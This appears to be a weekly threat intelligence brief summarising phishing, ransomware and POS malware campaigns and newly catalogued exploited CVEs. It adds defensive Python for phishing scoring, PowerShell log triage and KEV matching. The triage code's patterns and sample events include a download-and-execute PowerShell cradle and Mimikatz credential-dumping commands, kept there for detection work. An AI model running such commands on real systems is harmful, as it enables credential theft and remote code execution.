Cyber Intel Brief: Oct 20 – 26, 2022


Student Emails Used to Send Phishing Emails

Impacted Industries: Educational Services; Professional, Scientific, and Technical Services; potentially all

What You Need To Know:

Avanan, an email security provider, observed a threat actor using a compromised email account belonging to a student at an Arizona-based university to send phishing emails to numerous organizations. The emails masquerade as a “Messages Blocked” quarantine notice with a “Release messages” call-to-action button that redirects the recipient to a credential-harvesting page.

Analyst Note: Two factors likely helped the email bypass security controls: it came from a legitimate, established sender address (so sender reputation and SPF/DKIM/DMARC checks would pass), and at the time only two vendors on VirusTotal flagged the phishing page as malicious. How the student’s account was compromised is not stated; falling for an earlier phishing email, a weak or reused password, and the absence of MFA are the most likely contributing factors.
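The lure above defeats sender-reputation checks precisely because the sender is real, so a useful control looks at the body instead: quarantine-release wording paired with a "release" link that points outside the sender's own domain. The following is an added example, not code from Avanan or from the original brief; the lure phrases, the trusted quarantine host (quarantine.example-corp.com), and both sample messages are constructed assumptions.

```python
import re
from email import message_from_string, policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Phrases typical of a fake quarantine / "messages blocked" notice. Tuned to the
# lure in the brief; assumption: extend this list for your own environment.
LURE_PHRASES = ("messages blocked", "release messages", "held messages", "quarantine")

# Assumption: hosts that legitimately send quarantine digests in this tenant.
TRUSTED_LINK_HOSTS = {"quarantine.example-corp.com"}

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def sender_domain(msg):
    """Domain of the RFC 5322 From: address (the part a reputation check trusts)."""
    addr = parseaddr(str(msg.get("From", "")))[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def body_text(msg):
    """Concatenate every text/plain and text/html part, decoded."""
    return "\n".join(
        part.get_content()
        for part in msg.walk()
        if part.get_content_type() in ("text/plain", "text/html")
    )


def score_quarantine_lure(raw_eml):
    """Return a verdict dict: 'phish' when lure wording is paired with a link that
    points somewhere other than the sender's own domain or a trusted quarantine
    host. Sender reputation is deliberately ignored: a hijacked student account
    passes SPF/DKIM/DMARC, which is exactly what happened in the brief."""
    msg = message_from_string(raw_eml, policy=policy.default)
    text = body_text(msg)
    haystack = (str(msg.get("Subject", "")) + "\n" + text).lower()
    phrases = [p for p in LURE_PHRASES if p in haystack]

    sdom = sender_domain(msg)
    offsite_links = []
    for url in URL_RE.findall(text):
        host = (urlparse(url).hostname or "").lower()
        same_org = bool(sdom) and (host == sdom or host.endswith("." + sdom))
        if host and not same_org and host not in TRUSTED_LINK_HOSTS:
            offsite_links.append(url)

    verdict = "phish" if phrases and offsite_links else "clean"
    return {"verdict": verdict, "sender_domain": sdom,
            "phrases": phrases, "offsite_links": offsite_links}


# Constructed sample resembling the lure described above (not the real email).
SAMPLE_PHISH = """\
From: "Mail Gateway" <jdoe42@university.example>
To: payroll@victim.example
Subject: 3 Messages Blocked - Action Required
Content-Type: text/html; charset="utf-8"

<html><body>
<p>3 incoming messages were blocked by the mail filter.</p>
<p><a href="https://secure-mail-release.example.net/login?u=payroll">Release messages</a></p>
</body></html>
"""

# Constructed benign digest: same wording, but the link goes to the trusted host.
SAMPLE_BENIGN = SAMPLE_PHISH.replace(
    "https://secure-mail-release.example.net/login?u=payroll",
    "https://quarantine.example-corp.com/digest/payroll")

if __name__ == "__main__":
    for name, eml in (("phish", SAMPLE_PHISH), ("benign", SAMPLE_BENIGN)):
        print(name, score_quarantine_lure(eml))
```

The same wording is scored clean when the link resolves to the tenant's own quarantine host, so the rule keys on the destination mismatch rather than on the vocabulary alone, which is what a low VirusTotal hit count for the landing page leaves you with.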


TTPs and Observables for a Healthcare Ransomware Group Revealed

Impacted Industries: Health Care and Social Assistance

What You Need To Know:

CISA released a joint Cybersecurity Advisory that includes recently and historically observed TTPs and observables for a ransomware and data extortion group that actively targets the healthcare and social assistance sectors. In the incidents detailed in the advisory, the threat actor (TA) likely exploited an unpatched vulnerability in a VPN server in one case and, in another, used compromised credentials to access a legacy VPN server that did not have MFA enabled; the credentials were likely obtained through a phishing email with a malicious attachment.

Analyst Note: The advisory does not detail TTPs for data exfiltration, but according to a HIPAA Journal article, the threat actors claimed responsibility for the data breach of the Fitzgibbons Hospital in Marshall, MO, and exfiltrated 40GB of data, including data from MEDITECH and internal servers.


LV Ransomware Incident Analysis

Impacted Industries: Manufacturing, Information, Retail, and Professional, Scientific, and Technical Services

What You Need To Know:

In early September, an LV ransomware affiliate compromised a Jordanian organization by exploiting Microsoft Exchange servers vulnerable to ProxyShell. The affiliate used PowerShell, Mimikatz, NetScan, Advanced Port Scanner, and RDP during the intrusion. According to open-source reporting, the threat actor has targeted organizations globally in the manufacturing, information, retail trade, and professional, scientific, and technical services sectors.

Analyst Note: The affiliate’s reliance on several publicly available tools and on PowerShell commands and scripts suggests the organization did not have adequate logging, monitoring, and alerting; PowerShell script block logging and process-creation auditing would surface most of this activity.


DEV-0832 (Vice Society) Ransomware TTP Analysis

Impacted Industries: Educational Services, Retail Trade, and Public Administration

What You Need To Know:

Microsoft has detected active ransomware and extortion campaigns impacting the US educational services sector by a ransomware affiliate. The threat actor has shifted ransomware payloads over time, previously using various ransomware-as-a-service variants. Their latest payload is a variant of the publicly available Zeppelin ransomware. The affiliate relies on common TTPs, including PowerShell scripts, legitimate tools, exploiting vulnerabilities for initial access and post-compromise elevation of privilege, and commodity backdoors.

Analyst Note: The initial access vector is unknown, but according to open-source reporting, the threat actor has exploited vulnerable internet-exposed web applications and targeted organizations in the educational services, retail trade, and public administration sectors.
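Both the LV incident above and the DEV-0832 campaigns lean on PowerShell and on well-known tools such as Mimikatz, NetScan, and Advanced Port Scanner, which is exactly the activity that Windows Security event 4688 (process creation with command line) and PowerShell Operational event 4104 (script block logging) record. The following is an added example, not code from the original brief or from Microsoft; it runs a few content rules over constructed event records and decodes -EncodedCommand payloads so the rules see the real script. The rule set, the tool image names, and the sample events are assumptions to be tuned against your own telemetry.

```python
import base64
import re

# Tool image names from the LV and DEV-0832 reporting above (lower-case, as the
# attacker drops them). Assumption: add renamed copies seen in your own cases.
SUSPECT_IMAGES = {"mimikatz.exe", "netscan.exe", "advanced_port_scanner.exe"}

# Content rules applied to script blocks (4104) and command lines (4688).
SCRIPT_RULES = [
    ("mimikatz_in_memory", re.compile(r"invoke-mimikatz|sekurlsa::|lsadump::", re.I)),
    ("download_cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)),
    ("amsi_tamper", re.compile(r"amsiutils|amsiinitfailed", re.I)),
    ("rdp_enable", re.compile(r"fDenyTSConnections|Enable-NetFirewallRule.*Remote Desktop", re.I)),
]

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(cmdline):
    """PowerShell -EncodedCommand carries UTF-16LE text in base64; return it or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """Run the rules over event dicts; return (host, rule, evidence) tuples."""
    alerts = []
    for ev in events:
        host = ev["Computer"]
        if ev["EventID"] == 4688:
            image = ev.get("NewProcessName", "").rsplit("\\", 1)[-1].lower()
            if image in SUSPECT_IMAGES:
                alerts.append((host, "known_attack_tool", image))
            decoded = decode_encoded_command(ev.get("CommandLine", ""))
            if decoded:
                alerts.append((host, "encoded_powershell", decoded.strip()))
            text = decoded or ev.get("CommandLine", "")
        elif ev["EventID"] == 4104:
            text = ev.get("ScriptBlockText", "")
        else:
            continue
        for rule, pattern in SCRIPT_RULES:
            if pattern.search(text):
                alerts.append((host, rule, text.strip()[:80]))
    return alerts


def _enc(ps):
    # Used only to build the sample: encode exactly as a PowerShell launcher would.
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample events (not real telemetry), shaped like Security 4688 and
# PowerShell Operational 4104 records after field extraction.
SAMPLE_EVENTS = [
    {"Computer": "EXCH01", "EventID": 4688,
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/m.ps1')")},
    {"Computer": "EXCH01", "EventID": 4104,
     "ScriptBlockText": "Invoke-Mimikatz -Command '\"sekurlsa::logonpasswords\"'"},
    {"Computer": "FS02", "EventID": 4688,
     "NewProcessName": r"C:\Users\Public\netscan.exe",
     "CommandLine": "netscan.exe /range:10.0.0.0/24"},
    {"Computer": "WS17", "EventID": 4688,
     "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe C:\\notes.txt"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Decoding the encoded command before matching matters: a download cradle hidden behind -enc produces no hit on the raw command line, but the decoded text trips the download_cradle rule and is also reported on its own, since encoded launches from an Exchange server are rarely legitimate.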


Over 161,000 Credit Cards Stolen in POS Malware Campaign

Impacted Industries: Retail Trade

What You Need To Know:

A still-active C2 server analyzed by Group-IB reveals that threat actors have stolen 161,866 US bank-issued payment records. Most infected devices are in Texas, Illinois, Missouri, Florida, and California. The C2 server analyzed by Group-IB housed admin panels for two POS malware families, MajikPOS and Treasure Hunter.

Analyst Note: Although recent trends show a shift toward eCommerce retailers for gathering payment card data, this discovery indicates that POS malware still threatens brick-and-mortar retail organizations. The initial compromise vector for these devices is unknown, but typical MajikPOS infections begin with scanning for exposed and poorly secured Virtual Network Computing (VNC) and RDP services, or with access purchased from initial access brokers.

Exploited Vulnerabilities

CISA Adds 9 CVEs to its Known Exploited Vulnerabilities Catalog

Impacted Industries: All

What You Need To Know:

Based on evidence of active exploitation, CISA has added nine vulnerabilities to its Known Exploited Vulnerabilities Catalog. Affected software includes GIGABYTE drivers, Zimbra Collaboration, Cisco AnyConnect, and Apple iOS and iPadOS. The vulnerabilities added this week could allow a threat actor to take complete control of a device, execute arbitrary code, hijack a DLL, or elevate privileges.

Analyst Note: Open-source reporting consistently places exploitation of public-facing applications among the top initial access vectors. Threat actors used CVE-2020-3153 and CVE-2020-3433 in Linux ransomware incidents against Russian organizations, two ransomware variants incorporated exploits for CVE-2018-19320, and little information exists about exploitation of the other CVEs.
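The practical follow-up to a KEV addition is to find out which of your assets run the listed vendor and product before the CISA due date. The following is an added example, not code from the original brief or from CISA; it filters a catalog excerpt by dateAdded and joins it against an asset inventory. The JSON shape follows CISA's published feed (cveID, vendorProject, product, dateAdded, dueDate), but the entry values, the inventory, and the dates are constructed for illustration. One caveat a practitioner should keep in mind: the KEV feed carries no version information, so every hit is a candidate exposure to confirm against the vendor advisory and the installed version, not a confirmed vulnerable host.

```python
import json
from datetime import date

# Constructed excerpt in the shape of the CISA KEV JSON feed. Field names follow
# the feed; values (dates, product strings, the last entry) are illustrative only.
SAMPLE_KEV_JSON = """
{
  "title": "CISA Catalog of Known Exploited Vulnerabilities",
  "vulnerabilities": [
    {"cveID": "CVE-2020-3153", "vendorProject": "Cisco",
     "product": "AnyConnect Secure Mobility Client",
     "dateAdded": "2022-10-24", "dueDate": "2022-11-14"},
    {"cveID": "CVE-2018-19320", "vendorProject": "Gigabyte",
     "product": "Multiple Products",
     "dateAdded": "2022-10-24", "dueDate": "2022-11-14"},
    {"cveID": "CVE-2022-41352", "vendorProject": "Zimbra",
     "product": "Collaboration (ZCS)",
     "dateAdded": "2022-10-20", "dueDate": "2022-11-14"},
    {"cveID": "CVE-2021-00001", "vendorProject": "ExampleCorp",
     "product": "ExampleApp",
     "dateAdded": "2021-11-03", "dueDate": "2021-11-17"}
  ]
}
"""

# Constructed asset inventory (hypothetical hosts and versions).
SAMPLE_INVENTORY = [
    {"host": "lt-0042", "vendor": "Cisco", "product": "AnyConnect Secure Mobility Client", "version": "4.8.01090"},
    {"host": "ws-0117", "vendor": "Gigabyte", "product": "APP Center", "version": "21.0112.1"},
    {"host": "mail-01", "vendor": "Zimbra", "product": "Collaboration", "version": "9.0.0"},
    {"host": "db-02", "vendor": "PostgreSQL", "product": "PostgreSQL", "version": "14.5"},
]


def load_kev(text):
    """Parse the feed and return its vulnerability entries."""
    return json.loads(text)["vulnerabilities"]


def added_since(entries, since):
    """Keep entries whose dateAdded is on or after `since` (e.g. this week's additions)."""
    return [e for e in entries if date.fromisoformat(e["dateAdded"]) >= since]


def _norm(s):
    return " ".join(s.lower().split())


def _product_matches(kev_product, asset_product):
    # KEV product strings are free text; accept containment either way, and treat
    # the catalog's "Multiple Products" as matching anything from that vendor.
    k, a = _norm(kev_product), _norm(asset_product)
    return k == "multiple products" or k in a or a in k


def match_inventory(entries, inventory, today):
    """Return candidate exposures: (host, cveID, dueDate, overdue) per matching asset."""
    hits = []
    for asset in inventory:
        for e in entries:
            if _norm(e["vendorProject"]) != _norm(asset["vendor"]):
                continue
            if not _product_matches(e["product"], asset["product"]):
                continue
            due = date.fromisoformat(e["dueDate"])
            hits.append({"host": asset["host"], "cveID": e["cveID"],
                         "dueDate": e["dueDate"], "overdue": due < today})
    return hits


if __name__ == "__main__":
    this_week = added_since(load_kev(SAMPLE_KEV_JSON), date(2022, 10, 20))
    for hit in match_inventory(this_week, SAMPLE_INVENTORY, date.today()):
        print(hit)
```

The vendor comparison is exact while the product comparison is loose; that bias is deliberate, since a false positive here costs an analyst a version check, whereas a false negative leaves an exploited vulnerability unpatched past the due date.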

What We Mean When We Say

Estimates of Likelihood

We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms “unlikely” and “remote” imply that an event has a lower than even chance of occurring; they do not imply that it will not occur. Terms like “might” reflect situations where we are unable to assess the likelihood, usually because the relevant information is lacking, sketchy, or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or distant event with significant consequences.

Confidence in Assessments

Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:

  • High confidence indicates that our judgments are based on reliable information and/or that the nature of the problem allows us to make a sound judgment. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
  • Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
  • Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.



Subscribe to the Deepwatch Insights Blog